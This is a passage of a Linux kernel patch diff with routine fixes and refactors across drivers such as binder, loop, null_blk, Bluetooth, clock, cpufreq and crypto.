+ 		binder_alloc_debug(BINDER_DEBUG_BUFFER_ALLOC_ASYNC,
+ 			     "%d: binder_alloc_buf size %zd async free %zd\n",
+ 			      alloc->pid, size, alloc->free_async_space);
+@@ -657,8 +656,7 @@ static void binder_free_buf_locked(struct binder_alloc *alloc,
+ 	BUG_ON(buffer->user_data > alloc->buffer + alloc->buffer_size);
+ 
+ 	if (buffer->async_transaction) {
+-		alloc->free_async_space += buffer_size + sizeof(struct binder_buffer);
+-
++		alloc->free_async_space += buffer_size;
+ 		binder_alloc_debug(BINDER_DEBUG_BUFFER_ALLOC_ASYNC,
+ 			     "%d: binder_free_buf size %zd async free %zd\n",
+ 			      alloc->pid, size, alloc->free_async_space);
+diff --git a/drivers/base/node.c b/drivers/base/node.c
+index faf3597a96da9..a4141b57b1478 100644
+--- a/drivers/base/node.c
++++ b/drivers/base/node.c
+@@ -859,11 +859,15 @@ int __register_one_node(int nid)
+ {
+ 	int error;
+ 	int cpu;
++	struct node *node;
+ 
+-	node_devices[nid] = kzalloc(sizeof(struct node), GFP_KERNEL);
+-	if (!node_devices[nid])
++	node = kzalloc(sizeof(struct node), GFP_KERNEL);
++	if (!node)
+ 		return -ENOMEM;
+ 
++	INIT_LIST_HEAD(&node->access_list);
++	node_devices[nid] = node;
++
+ 	error = register_node(node_devices[nid], nid);
+ 
+ 	/* link cpu under this node */
+@@ -872,7 +876,6 @@ int __register_one_node(int nid)
+ 			register_cpu_under_node(cpu, nid);
+ 	}
+ 
+-	INIT_LIST_HEAD(&node_devices[nid]->access_list);
+ 	node_init_caches(nid);
+ 
+ 	return error;
+diff --git a/drivers/base/swnode.c b/drivers/base/swnode.c
+index 0a482212c7e8e..44153caa893ad 100644
+--- a/drivers/base/swnode.c
++++ b/drivers/base/swnode.c
+@@ -541,6 +541,9 @@ software_node_get_reference_args(const struct fwnode_handle *fwnode,
+ 	if (nargs > NR_FWNODE_REFERENCE_ARGS)
+ 		return -EINVAL;
+ 
++	if (!args)
++		return 0;
++
+ 	args->fwnode = software_node_get(refnode);
+ 	args->nargs = nargs;
+ 
+diff --git a/drivers/block/loop.c b/drivers/block/loop.c
+index 127e3ceb59799..12ff6f58b8a90 100644
+--- a/drivers/block/loop.c
++++ b/drivers/block/loop.c
+@@ -165,39 +165,37 @@ static loff_t get_loop_size(struct loop_device *lo, struct file *file)
+ 	return get_size(lo->lo_offset, lo->lo_sizelimit, file);
+ }
+ 
++/*
++ * We support direct I/O only if lo_offset is aligned with the logical I/O size
++ * of backing device, and the logical block size of loop is bigger than that of
++ * the backing device.
++ */
++static bool lo_bdev_can_use_dio(struct loop_device *lo,
++		struct block_device *backing_bdev)
++{
++	unsigned short sb_bsize = bdev_logical_block_size(backing_bdev);
++
++	if (queue_logical_block_size(lo->lo_queue) < sb_bsize)
++		return false;
++	if (lo->lo_offset & (sb_bsize - 1))
++		return false;
++	return true;
++}
++
+ static void __loop_update_dio(struct loop_device *lo, bool dio)
+ {
+ 	struct file *file = lo->lo_backing_file;
+-	struct address_space *mapping = file->f_mapping;
+-	struct inode *inode = mapping->host;
+-	unsigned short sb_bsize = 0;
+-	unsigned dio_align = 0;
++	struct inode *inode = file->f_mapping->host;
++	struct block_device *backing_bdev = NULL;
+ 	bool use_dio;
+ 
+-	if (inode->i_sb->s_bdev) {
+-		sb_bsize = bdev_logical_block_size(inode->i_sb->s_bdev);
+-		dio_align = sb_bsize - 1;
+-	}
++	if (S_ISBLK(inode->i_mode))
++		backing_bdev = I_BDEV(inode);
++	else if (inode->i_sb->s_bdev)
++		backing_bdev = inode->i_sb->s_bdev;
+ 
+-	/*
+-	 * We support direct I/O only if lo_offset is aligned with the
+-	 * logical I/O size of backing device, and the logical block
+-	 * size of loop is bigger than the backing device's.
+-	 *
+-	 * TODO: the above condition may be loosed in the future, and
+-	 * direct I/O may be switched runtime at that time because most
+-	 * of requests in sane applications should be PAGE_SIZE aligned
+-	 */
+-	if (dio) {
+-		if (queue_logical_block_size(lo->lo_queue) >= sb_bsize &&
+-		    !(lo->lo_offset & dio_align) &&
+-		    (file->f_mode & FMODE_CAN_ODIRECT))
+-			use_dio = true;
+-		else
+-			use_dio = false;
+-	} else {
+-		use_dio = false;
+-	}
++	use_dio = dio && (file->f_mode & FMODE_CAN_ODIRECT) &&
++		(!backing_bdev || lo_bdev_can_use_dio(lo, backing_bdev));
+ 
+ 	if (lo->use_dio == use_dio)
+ 		return;
+diff --git a/drivers/block/null_blk/main.c b/drivers/block/null_blk/main.c
+index e9f38eba2f133..959952e8ede38 100644
+--- a/drivers/block/null_blk/main.c
++++ b/drivers/block/null_blk/main.c
+@@ -2114,11 +2114,8 @@ static int null_add_dev(struct nullb_device *dev)
+ 
+ 	blk_queue_logical_block_size(nullb->q, dev->blocksize);
+ 	blk_queue_physical_block_size(nullb->q, dev->blocksize);
+-	if (!dev->max_sectors)
+-		dev->max_sectors = queue_max_hw_sectors(nullb->q);
+-	dev->max_sectors = min_t(unsigned int, dev->max_sectors,
+-				 BLK_DEF_MAX_SECTORS);
+-	blk_queue_max_hw_sectors(nullb->q, dev->max_sectors);
++	if (dev->max_sectors)
++		blk_queue_max_hw_sectors(nullb->q, dev->max_sectors);
+ 
+ 	if (dev->virt_boundary)
+ 		blk_queue_virt_boundary(nullb->q, PAGE_SIZE - 1);
+@@ -2218,12 +2215,6 @@ static int __init null_init(void)
+ 		g_bs = PAGE_SIZE;
+ 	}
+ 
+-	if (g_max_sectors > BLK_DEF_MAX_SECTORS) {
+-		pr_warn("invalid max sectors\n");
+-		pr_warn("defaults max sectors to %u\n", BLK_DEF_MAX_SECTORS);
+-		g_max_sectors = BLK_DEF_MAX_SECTORS;
+-	}
+-
+ 	if (g_home_node != NUMA_NO_NODE && g_home_node >= nr_online_nodes) {
+ 		pr_err("invalid home_node value\n");
+ 		g_home_node = NUMA_NO_NODE;
+diff --git a/drivers/bluetooth/btmtkuart.c b/drivers/bluetooth/btmtkuart.c
+index c98691cdbbd55..04b72394dda5b 100644
+--- a/drivers/bluetooth/btmtkuart.c
++++ b/drivers/bluetooth/btmtkuart.c
+@@ -337,7 +337,7 @@ mtk_stp_split(struct btmtkuart_dev *bdev, const unsigned char *data, int count,
+ 	return data;
+ }
+ 
+-static int btmtkuart_recv(struct hci_dev *hdev, const u8 *data, size_t count)
++static void btmtkuart_recv(struct hci_dev *hdev, const u8 *data, size_t count)
+ {
+ 	struct btmtkuart_dev *bdev = hci_get_drvdata(hdev);
+ 	const unsigned char *p_left = data, *p_h4;
+@@ -376,25 +376,20 @@ static int btmtkuart_recv(struct hci_dev *hdev, const u8 *data, size_t count)
+ 			bt_dev_err(bdev->hdev,
+ 				   "Frame reassembly failed (%d)", err);
+ 			bdev->rx_skb = NULL;
+-			return err;
++			return;
+ 		}
+ 
+ 		sz_left -= sz_h4;
+ 		p_left += sz_h4;
+ 	}
+-
+-	return 0;
+ }
+ 
+ static int btmtkuart_receive_buf(struct serdev_device *serdev, const u8 *data,
+ 				 size_t count)
+ {
+ 	struct btmtkuart_dev *bdev = serdev_device_get_drvdata(serdev);
+-	int err;
+ 
+-	err = btmtkuart_recv(bdev->hdev, data, count);
+-	if (err < 0)
+-		return err;
++	btmtkuart_recv(bdev->hdev, data, count);
+ 
+ 	bdev->hdev->stat.byte_rx += count;
+ 
+diff --git a/drivers/clk/clk-si5341.c b/drivers/clk/clk-si5341.c
+index c7d8cbd22bacc..5acb35236c58d 100644
+--- a/drivers/clk/clk-si5341.c
++++ b/drivers/clk/clk-si5341.c
+@@ -892,10 +892,8 @@ static int si5341_output_clk_set_rate(struct clk_hw *hw, unsigned long rate,
+ 	r[0] = r_div ? (r_div & 0xff) : 1;
+ 	r[1] = (r_div >> 8) & 0xff;
+ 	r[2] = (r_div >> 16) & 0xff;
+-	err = regmap_bulk_write(output->data->regmap,
++	return regmap_bulk_write(output->data->regmap,
+ 			SI5341_OUT_R_REG(output), r, 3);
+-
+-	return 0;
+ }
+ 
+ static int si5341_output_reparent(struct clk_si5341_output *output, u8 index)
+diff --git a/drivers/clk/qcom/gpucc-sm8150.c b/drivers/clk/qcom/gpucc-sm8150.c
+index 8422fd0474932..c89a5b59ddb7c 100644
+--- a/drivers/clk/qcom/gpucc-sm8150.c
++++ b/drivers/clk/qcom/gpucc-sm8150.c
+@@ -37,8 +37,8 @@ static struct alpha_pll_config gpu_cc_pll1_config = {
+ 	.config_ctl_hi_val = 0x00002267,
+ 	.config_ctl_hi1_val = 0x00000024,
+ 	.test_ctl_val = 0x00000000,
+-	.test_ctl_hi_val = 0x00000002,
+-	.test_ctl_hi1_val = 0x00000000,
++	.test_ctl_hi_val = 0x00000000,
++	.test_ctl_hi1_val = 0x00000020,
+ 	.user_ctl_val = 0x00000000,
+ 	.user_ctl_hi_val = 0x00000805,
+ 	.user_ctl_hi1_val = 0x000000d0,
+diff --git a/drivers/clk/qcom/videocc-sm8150.c b/drivers/clk/qcom/videocc-sm8150.c
+index 1afdbe4a249d6..52a9a453a1432 100644
+--- a/drivers/clk/qcom/videocc-sm8150.c
++++ b/drivers/clk/qcom/videocc-sm8150.c
+@@ -33,6 +33,7 @@ static struct alpha_pll_config video_pll0_config = {
+ 	.config_ctl_val = 0x20485699,
+ 	.config_ctl_hi_val = 0x00002267,
+ 	.config_ctl_hi1_val = 0x00000024,
++	.test_ctl_hi1_val = 0x00000020,
+ 	.user_ctl_val = 0x00000000,
+ 	.user_ctl_hi_val = 0x00000805,
+ 	.user_ctl_hi1_val = 0x000000D0,
+@@ -214,6 +215,10 @@ static const struct regmap_config video_cc_sm8150_regmap_config = {
+ 
+ static const struct qcom_reset_map video_cc_sm8150_resets[] = {
+ 	[VIDEO_CC_MVSC_CORE_CLK_BCR] = { 0x850, 2 },
++	[VIDEO_CC_INTERFACE_BCR] = { 0x8f0 },
++	[VIDEO_CC_MVS0_BCR] = { 0x870 },
++	[VIDEO_CC_MVS1_BCR] = { 0x8b0 },
++	[VIDEO_CC_MVSC_BCR] = { 0x810 },
+ };
+ 
+ static const struct qcom_cc_desc video_cc_sm8150_desc = {
+diff --git a/drivers/clk/renesas/rzg2l-cpg.c b/drivers/clk/renesas/rzg2l-cpg.c
+index 84767cfc1e739..473feb36a38f2 100644
+--- a/drivers/clk/renesas/rzg2l-cpg.c
++++ b/drivers/clk/renesas/rzg2l-cpg.c
+@@ -1115,41 +1115,33 @@ fail:
+ 
+ #define rcdev_to_priv(x)	container_of(x, struct rzg2l_cpg_priv, rcdev)
+ 
+-static int rzg2l_cpg_reset(struct reset_controller_dev *rcdev,
+-			   unsigned long id)
+-{
+-	struct rzg2l_cpg_priv *priv = rcdev_to_priv(rcdev);
+-	const struct rzg2l_cpg_info *info = priv->info;
+-	unsigned int reg = info->resets[id].off;
+-	u32 dis = BIT(info->resets[id].bit);
+-	u32 we = dis << 16;
+-
+-	dev_dbg(rcdev->dev, "reset id:%ld offset:0x%x\n", id, CLK_RST_R(reg));
+-
+-	/* Reset module */
+-	writel(we, priv->base + CLK_RST_R(reg));
+-
+-	/* Wait for at least one cycle of the RCLK clock (@ ca. 32 kHz) */
+-	udelay(35);
+-
+-	/* Release module from reset state */
+-	writel(we | dis, priv->base + CLK_RST_R(reg));
+-
+-	return 0;
+-}
+-
+ static int rzg2l_cpg_assert(struct reset_controller_dev *rcdev,
+ 			    unsigned long id)
+ {
+ 	struct rzg2l_cpg_priv *priv = rcdev_to_priv(rcdev);
+ 	const struct rzg2l_cpg_info *info = priv->info;
+ 	unsigned int reg = info->resets[id].off;
+-	u32 value = BIT(info->resets[id].bit) << 16;
++	u32 mask = BIT(info->resets[id].bit);
++	s8 monbit = info->resets[id].monbit;
++	u32 value = mask << 16;
+ 
+ 	dev_dbg(rcdev->dev, "assert id:%ld offset:0x%x\n", id, CLK_RST_R(reg));
+ 
+ 	writel(value, priv->base + CLK_RST_R(reg));
+-	return 0;
++
++	if (info->has_clk_mon_regs) {
++		reg = CLK_MRST_R(reg);
++	} else if (monbit >= 0) {
++		reg = CPG_RST_MON;
++		mask = BIT(monbit);
++	} else {
++		/* Wait for at least one cycle of the RCLK clock (@ ca. 32 kHz) */
++		udelay(35);
++		return 0;
++	}
++
++	return readl_poll_timeout_atomic(priv->base + reg, value,
++					 value & mask, 10, 200);
+ }
+ 
+ static int rzg2l_cpg_deassert(struct reset_controller_dev *rcdev,
+@@ -1158,14 +1150,40 @@ static int rzg2l_cpg_deassert(struct reset_controller_dev *rcdev,
+ 	struct rzg2l_cpg_priv *priv = rcdev_to_priv(rcdev);
+ 	const struct rzg2l_cpg_info *info = priv->info;
+ 	unsigned int reg = info->resets[id].off;
+-	u32 dis = BIT(info->resets[id].bit);
+-	u32 value = (dis << 16) | dis;
++	u32 mask = BIT(info->resets[id].bit);
++	s8 monbit = info->resets[id].monbit;
++	u32 value = (mask << 16) | mask;
+ 
+ 	dev_dbg(rcdev->dev, "deassert id:%ld offset:0x%x\n", id,
+ 		CLK_RST_R(reg));
+ 
+ 	writel(value, priv->base + CLK_RST_R(reg));
+-	return 0;
++
++	if (info->has_clk_mon_regs) {
++		reg = CLK_MRST_R(reg);
++	} else if (monbit >= 0) {
++		reg = CPG_RST_MON;
++		mask = BIT(monbit);
++	} else {
++		/* Wait for at least one cycle of the RCLK clock (@ ca. 32 kHz) */
++		udelay(35);
++		return 0;
++	}
++
++	return readl_poll_timeout_atomic(priv->base + reg, value,
++					 !(value & mask), 10, 200);
++}
++
++static int rzg2l_cpg_reset(struct reset_controller_dev *rcdev,
++			   unsigned long id)
++{
++	int ret;
++
++	ret = rzg2l_cpg_assert(rcdev, id);
++	if (ret)
++		return ret;
++
++	return rzg2l_cpg_deassert(rcdev, id);
+ }
+ 
+ static int rzg2l_cpg_status(struct reset_controller_dev *rcdev,
+@@ -1173,18 +1191,21 @@ static int rzg2l_cpg_status(struct reset_controller_dev *rcdev,
+ {
+ 	struct rzg2l_cpg_priv *priv = rcdev_to_priv(rcdev);
+ 	const struct rzg2l_cpg_info *info = priv->info;
+-	unsigned int reg = info->resets[id].off;
+-	u32 bitmask = BIT(info->resets[id].bit);
+ 	s8 monbit = info->resets[id].monbit;
++	unsigned int reg;
++	u32 bitmask;
+ 
+ 	if (info->has_clk_mon_regs) {
+-		return !!(readl(priv->base + CLK_MRST_R(reg)) & bitmask);
++		reg = CLK_MRST_R(info->resets[id].off);
++		bitmask = BIT(info->resets[id].bit);
+ 	} else if (monbit >= 0) {
+-		u32 monbitmask = BIT(monbit);
+-
+-		return !!(readl(priv->base + CPG_RST_MON) & monbitmask);
++		reg = CPG_RST_MON;
++		bitmask = BIT(monbit);
++	} else {
++		return -ENOTSUPP;
+ 	}
+-	return -ENOTSUPP;
++
++	return !!(readl(priv->base + reg) & bitmask);
+ }
+ 
+ static const struct reset_control_ops rzg2l_cpg_reset_ops = {
+diff --git a/drivers/clk/zynqmp/clk-mux-zynqmp.c b/drivers/clk/zynqmp/clk-mux-zynqmp.c
+index 60359333f26db..9b5d3050b7422 100644
+--- a/drivers/clk/zynqmp/clk-mux-zynqmp.c
++++ b/drivers/clk/zynqmp/clk-mux-zynqmp.c
+@@ -89,7 +89,7 @@ static int zynqmp_clk_mux_set_parent(struct clk_hw *hw, u8 index)
+ static const struct clk_ops zynqmp_clk_mux_ops = {
+ 	.get_parent = zynqmp_clk_mux_get_parent,
+ 	.set_parent = zynqmp_clk_mux_set_parent,
+-	.determine_rate = __clk_mux_determine_rate,
++	.determine_rate = __clk_mux_determine_rate_closest,
+ };
+ 
+ static const struct clk_ops zynqmp_clk_mux_ro_ops = {
+diff --git a/drivers/clk/zynqmp/divider.c b/drivers/clk/zynqmp/divider.c
+index 33a3b2a226595..5a00487ae408b 100644
+--- a/drivers/clk/zynqmp/divider.c
++++ b/drivers/clk/zynqmp/divider.c
+@@ -110,52 +110,6 @@ static unsigned long zynqmp_clk_divider_recalc_rate(struct clk_hw *hw,
+ 	return DIV_ROUND_UP_ULL(parent_rate, value);
+ }
+ 
+-static void zynqmp_get_divider2_val(struct clk_hw *hw,
+-				    unsigned long rate,
+-				    struct zynqmp_clk_divider *divider,
+-				    u32 *bestdiv)
+-{
+-	int div1;
+-	int div2;
+-	long error = LONG_MAX;
+-	unsigned long div1_prate;
+-	struct clk_hw *div1_parent_hw;
+-	struct zynqmp_clk_divider *pdivider;
+-	struct clk_hw *div2_parent_hw = clk_hw_get_parent(hw);
+-
+-	if (!div2_parent_hw)
+-		return;
+-
+-	pdivider = to_zynqmp_clk_divider(div2_parent_hw);
+-	if (!pdivider)
+-		return;
+-
+-	div1_parent_hw = clk_hw_get_parent(div2_parent_hw);
+-	if (!div1_parent_hw)
+-		return;
+-
+-	div1_prate = clk_hw_get_rate(div1_parent_hw);
+-	*bestdiv = 1;
+-	for (div1 = 1; div1 <= pdivider->max_div;) {
+-		for (div2 = 1; div2 <= divider->max_div;) {
+-			long new_error = ((div1_prate / div1) / div2) - rate;
+-
+-			if (abs(new_error) < abs(error)) {
+-				*bestdiv = div2;
+-				error = new_error;
+-			}
+-			if (divider->flags & CLK_DIVIDER_POWER_OF_TWO)
+-				div2 = div2 << 1;
+-			else
+-				div2++;
+-		}
+-		if (pdivider->flags & CLK_DIVIDER_POWER_OF_TWO)
+-			div1 = div1 << 1;
+-		else
+-			div1++;
+-	}
+-}
+-
+ /**
+  * zynqmp_clk_divider_round_rate() - Round rate of divider clock
+  * @hw:			handle between common and hardware-specific interfaces
+@@ -174,6 +128,7 @@ static long zynqmp_clk_divider_round_rate(struct clk_hw *hw,
+ 	u32 div_type = divider->div_type;
+ 	u32 bestdiv;
+ 	int ret;
++	u8 width;
+ 
+ 	/* if read only, just return current value */
+ 	if (divider->flags & CLK_DIVIDER_READ_ONLY) {
+@@ -193,23 +148,12 @@ static long zynqmp_clk_divider_round_rate(struct clk_hw *hw,
+ 		return DIV_ROUND_UP_ULL((u64)*prate, bestdiv);
+ 	}
+ 
+-	bestdiv = zynqmp_divider_get_val(*prate, rate, divider->flags);
+-
+-	/*
+-	 * In case of two divisors, compute best divider values and return
+-	 * divider2 value based on compute value. div1 will  be automatically
+-	 * set to optimum based on required total divider value.
+-	 */
+-	if (div_type == TYPE_DIV2 &&
+-	    (clk_hw_get_flags(hw) & CLK_SET_RATE_PARENT)) {
+-		zynqmp_get_divider2_val(hw, rate, divider, &bestdiv);
+-	}
++	width = fls(divider->max_div);
+ 
+-	if ((clk_hw_get_flags(hw) & CLK_SET_RATE_PARENT) && divider->is_frac)
+-		bestdiv = rate % *prate ? 1 : bestdiv;
++	rate = divider_round_rate(hw, rate, prate, NULL, width, divider->flags);
+ 
+-	bestdiv = min_t(u32, bestdiv, divider->max_div);
+-	*prate = rate * bestdiv;
++	if (divider->is_frac && (clk_hw_get_flags(hw) & CLK_SET_RATE_PARENT) && (rate % *prate))
++		*prate = rate;
+ 
+ 	return rate;
+ }
+diff --git a/drivers/clocksource/timer-ti-dm.c b/drivers/clocksource/timer-ti-dm.c
+index ec86aecb748f1..7f9c1f58a9477 100644
+--- a/drivers/clocksource/timer-ti-dm.c
++++ b/drivers/clocksource/timer-ti-dm.c
+@@ -184,7 +184,7 @@ static inline u32 dmtimer_read(struct dmtimer *timer, u32 reg)
+  * dmtimer_write - write timer registers in posted and non-posted mode
+  * @timer:      timer pointer over which write operation is to perform
+  * @reg:        lowest byte holds the register offset
+- * @value:      data to write into the register
++ * @val:        data to write into the register
+  *
+  * The posted mode bit is encoded in reg. Note that in posted mode, the write
+  * pending bit must be checked. Otherwise a write on a register which has a
+@@ -937,7 +937,7 @@ static int omap_dm_timer_set_int_enable(struct omap_dm_timer *cookie,
+ 
+ /**
+  * omap_dm_timer_set_int_disable - disable timer interrupts
+- * @timer:	pointer to timer handle
++ * @cookie:	pointer to timer cookie
+  * @mask:	bit mask of interrupts to be disabled
+  *
+  * Disables the specified timer interrupts for a timer.
+diff --git a/drivers/cpufreq/cpufreq-dt-platdev.c b/drivers/cpufreq/cpufreq-dt-platdev.c
+index 69a8742c0a7a3..8514bb62dd10b 100644
+--- a/drivers/cpufreq/cpufreq-dt-platdev.c
++++ b/drivers/cpufreq/cpufreq-dt-platdev.c
+@@ -176,7 +176,7 @@ static bool __init cpu0_node_has_opp_v2_prop(void)
+ 	struct device_node *np = of_cpu_device_node_get(0);
+ 	bool ret = false;
+ 
+-	if (of_get_property(np, "operating-points-v2", NULL))
++	if (of_property_present(np, "operating-points-v2"))
+ 		ret = true;
+ 
+ 	of_node_put(np);
+diff --git a/drivers/cpufreq/imx-cpufreq-dt.c b/drivers/cpufreq/imx-cpufreq-dt.c
+index 76e553af20711..535867a7dfdde 100644
+--- a/drivers/cpufreq/imx-cpufreq-dt.c
++++ b/drivers/cpufreq/imx-cpufreq-dt.c
+@@ -89,7 +89,7 @@ static int imx_cpufreq_dt_probe(struct platform_device *pdev)
+ 
+ 	cpu_dev = get_cpu_device(0);
+ 
+-	if (!of_find_property(cpu_dev->of_node, "cpu-supply", NULL))
++	if (!of_property_present(cpu_dev->of_node, "cpu-supply"))
+ 		return -ENODEV;
+ 
+ 	if (of_machine_is_compatible("fsl,imx7ulp")) {
+diff --git a/drivers/cpufreq/imx6q-cpufreq.c b/drivers/cpufreq/imx6q-cpufreq.c
+index 925fc17eaacb2..39b0362a3b9ac 100644
+--- a/drivers/cpufreq/imx6q-cpufreq.c
++++ b/drivers/cpufreq/imx6q-cpufreq.c
+@@ -230,7 +230,7 @@ static int imx6q_opp_check_speed_grading(struct device *dev)
+ 	u32 val;
+ 	int ret;
+ 
+-	if (of_find_property(dev->of_node, "nvmem-cells", NULL)) {
++	if (of_property_present(dev->of_node, "nvmem-cells")) {
+ 		ret = nvmem_cell_read_u32(dev, "speed_grade", &val);
+ 		if (ret)
+ 			return ret;
+@@ -285,7 +285,7 @@ static int imx6ul_opp_check_speed_grading(struct device *dev)
+ 	u32 val;
+ 	int ret = 0;
+ 
+-	if (of_find_property(dev->of_node, "nvmem-cells", NULL)) {
++	if (of_property_present(dev->of_node, "nvmem-cells")) {
+ 		ret = nvmem_cell_read_u32(dev, "speed_grade", &val);
+ 		if (ret)
+ 			return ret;
+diff --git a/drivers/cpufreq/scmi-cpufreq.c b/drivers/cpufreq/scmi-cpufreq.c
+index 513a071845c26..028df8a5f537a 100644
+--- a/drivers/cpufreq/scmi-cpufreq.c
++++ b/drivers/cpufreq/scmi-cpufreq.c
+@@ -310,8 +310,11 @@ static int scmi_cpufreq_probe(struct scmi_device *sdev)
+ 
+ #ifdef CONFIG_COMMON_CLK
+ 	/* dummy clock provider as needed by OPP if clocks property is used */
+-	if (of_find_property(dev->of_node, "#clock-cells", NULL))
+-		devm_of_clk_add_hw_provider(dev, of_clk_hw_simple_get, NULL);
++	if (of_property_present(dev->of_node, "#clock-cells")) {
++		ret = devm_of_clk_add_hw_provider(dev, of_clk_hw_simple_get, NULL);
++		if (ret)
++			return dev_err_probe(dev, ret, "%s: registering clock provider failed\n", __func__);
++	}
+ #endif
+ 
+ 	ret = cpufreq_register_driver(&scmi_cpufreq_driver);
+diff --git a/drivers/cpufreq/tegra20-cpufreq.c b/drivers/cpufreq/tegra20-cpufreq.c
+index ab7ac7df9e62e..dfd2de4f8e07e 100644
+--- a/drivers/cpufreq/tegra20-cpufreq.c
++++ b/drivers/cpufreq/tegra20-cpufreq.c
+@@ -25,7 +25,7 @@ static bool cpu0_node_has_opp_v2_prop(void)
+ 	struct device_node *np = of_cpu_device_node_get(0);
+ 	bool ret = false;
+ 
+-	if (of_get_property(np, "operating-points-v2", NULL))
++	if (of_property_present(np, "operating-points-v2"))
+ 		ret = true;
+ 
+ 	of_node_put(np);
+diff --git a/drivers/crypto/ccp/ccp-ops.c b/drivers/crypto/ccp/ccp-ops.c
+index aa4e1a5006919..cb8e99936abb7 100644
+--- a/drivers/crypto/ccp/ccp-ops.c
++++ b/drivers/crypto/ccp/ccp-ops.c
+@@ -179,8 +179,11 @@ static int ccp_init_dm_workarea(struct ccp_dm_workarea *wa,
+ 
+ 		wa->dma.address = dma_map_single(wa->dev, wa->address, len,
+ 						 dir);
+-		if (dma_mapping_error(wa->dev, wa->dma.address))
++		if (dma_mapping_error(wa->dev, wa->dma.address)) {
++			kfree(wa->address);
++			wa->address = NULL;
+ 			return -ENOMEM;
++		}
+ 
+ 		wa->dma.length = len;
+ 	}
+diff --git a/drivers/crypto/hisilicon/hpre/hpre_main.c b/drivers/crypto/hisilicon/hpre/hpre_main.c
+index ff8a5f20a5df0..269df4ec148ba 100644
+--- a/drivers/crypto/hisilicon/hpre/hpre_main.c
++++ b/drivers/crypto/hisilicon/hpre/hpre_main.c
+@@ -118,8 +118,6 @@
+ #define HPRE_DFX_COMMON2_LEN		0xE
+ #define HPRE_DFX_CORE_LEN		0x43
+ 
+-#define HPRE_DEV_ALG_MAX_LEN	256
+-
+ static const char hpre_name[] = "hisi_hpre";
+ static struct dentry *hpre_debugfs_root;
+ static const struct pci_device_id hpre_dev_ids[] = {
+@@ -135,12 +133,7 @@ struct hpre_hw_error {
+ 	const char *msg;
+ };
+ 
+-struct hpre_dev_alg {
+-	u32 alg_msk;
+-	const char *alg;
+-};
+-
+-static const struct hpre_dev_alg hpre_dev_algs[] = {
++static const struct qm_dev_alg hpre_dev_algs[] = {
+ 	{
+ 		.alg_msk = BIT(0),
+ 		.alg = "rsa\n"
+@@ -233,6 +226,20 @@ static const struct hisi_qm_cap_info hpre_basic_info[] = {
+ 	{HPRE_CORE10_ALG_BITMAP_CAP, 0x3170, 0, GENMASK(31, 0), 0x0, 0x10, 0x10}
+ };
+ 
++enum hpre_pre_store_cap_idx {
++	HPRE_CLUSTER_NUM_CAP_IDX = 0x0,
++	HPRE_CORE_ENABLE_BITMAP_CAP_IDX,
++	HPRE_DRV_ALG_BITMAP_CAP_IDX,
++	HPRE_DEV_ALG_BITMAP_CAP_IDX,
++};
++
++static const u32 hpre_pre_store_caps[] = {
++	HPRE_CLUSTER_NUM_CAP,
++	HPRE_CORE_ENABLE_BITMAP_CAP,
++	HPRE_DRV_ALG_BITMAP_CAP,
++	HPRE_DEV_ALG_BITMAP_CAP,
++};
++
+ static const struct hpre_hw_error hpre_hw_errors[] = {
+ 	{
+ 		.int_msk = BIT(0),
+@@ -352,42 +359,13 @@ bool hpre_check_alg_support(struct hisi_qm *qm, u32 alg)
+ {
+ 	u32 cap_val;
+ 
+-	cap_val = hisi_qm_get_hw_info(qm, hpre_basic_info, HPRE_DRV_ALG_BITMAP_CAP, qm->cap_ver);
++	cap_val = qm->cap_tables.dev_cap_table[HPRE_DRV_ALG_BITMAP_CAP_IDX].cap_val;
+ 	if (alg & cap_val)
+ 		return true;
+ 
+ 	return false;
+ }
+ 
+-static int hpre_set_qm_algs(struct hisi_qm *qm)
+-{
+-	struct device *dev = &qm->pdev->dev;
+-	char *algs, *ptr;
+-	u32 alg_msk;
+-	int i;
+-
+-	if (!qm->use_sva)
+-		return 0;
+-
+-	algs = devm_kzalloc(dev, HPRE_DEV_ALG_MAX_LEN * sizeof(char), GFP_KERNEL);
+-	if (!algs)
+-		return -ENOMEM;
+-
+-	alg_msk = hisi_qm_get_hw_info(qm, hpre_basic_info, HPRE_DEV_ALG_BITMAP_CAP, qm->cap_ver);
+-
+-	for (i = 0; i < ARRAY_SIZE(hpre_dev_algs); i++)
+-		if (alg_msk & hpre_dev_algs[i].alg_msk)
+-			strcat(algs, hpre_dev_algs[i].alg);
+-
+-	ptr = strrchr(algs, '\n');
+-	if (ptr)
+-		*ptr = '\0';
+-
+-	qm->uacce->algs = algs;
+-
+-	return 0;
+-}
+-
+ static int hpre_diff_regs_show(struct seq_file *s, void *unused)
+ {
+ 	struct hisi_qm *qm = s->private;
+@@ -457,16 +435,6 @@ static u32 vfs_num;
+ module_param_cb(vfs_num, &vfs_num_ops, &vfs_num, 0444);
+ MODULE_PARM_DESC(vfs_num, "Number of VFs to enable(1-63), 0(default)");
+ 
+-static inline int hpre_cluster_num(struct hisi_qm *qm)
+-{
+-	return hisi_qm_get_hw_info(qm, hpre_basic_info, HPRE_CLUSTER_NUM_CAP, qm->cap_ver);
+-}
+-
+-static inline int hpre_cluster_core_mask(struct hisi_qm *qm)
+-{
+-	return hisi_qm_get_hw_info(qm, hpre_basic_info, HPRE_CORE_ENABLE_BITMAP_CAP, qm->cap_ver);
+-}
+-
+ struct hisi_qp *hpre_create_qp(u8 type)
+ {
+ 	int node = cpu_to_node(smp_processor_id());
+@@ -533,13 +501,15 @@ static int hpre_cfg_by_dsm(struct hisi_qm *qm)
+ 
+ static int hpre_set_cluster(struct hisi_qm *qm)
+ {
+-	u32 cluster_core_mask = hpre_cluster_core_mask(qm);
+-	u8 clusters_num = hpre_cluster_num(qm);
+ 	struct device *dev = &qm->pdev->dev;
+ 	unsigned long offset;
++	u32 cluster_core_mask;
++	u8 clusters_num;
+ 	u32 val = 0;
+ 	int ret, i;
+ 
++	cluster_core_mask = qm->cap_tables.dev_cap_table[HPRE_CORE_ENABLE_BITMAP_CAP_IDX].cap_val;
++	clusters_num = qm->cap_tables.dev_cap_table[HPRE_CLUSTER_NUM_CAP_IDX].cap_val;
+ 	for (i = 0; i < clusters_num; i++) {
+ 		offset = i * HPRE_CLSTR_ADDR_INTRVL;
+ 
+@@ -734,11 +704,12 @@ static int hpre_set_user_domain_and_cache(struct hisi_qm *qm)
+ 
+ static void hpre_cnt_regs_clear(struct hisi_qm *qm)
+ {
+-	u8 clusters_num = hpre_cluster_num(qm);
+ 	unsigned long offset;
++	u8 clusters_num;
+ 	int i;
+ 
+ 	/* clear clusterX/cluster_ctrl */
++	clusters_num = qm->cap_tables.dev_cap_table[HPRE_CLUSTER_NUM_CAP_IDX].cap_val;
+ 	for (i = 0; i < clusters_num; i++) {
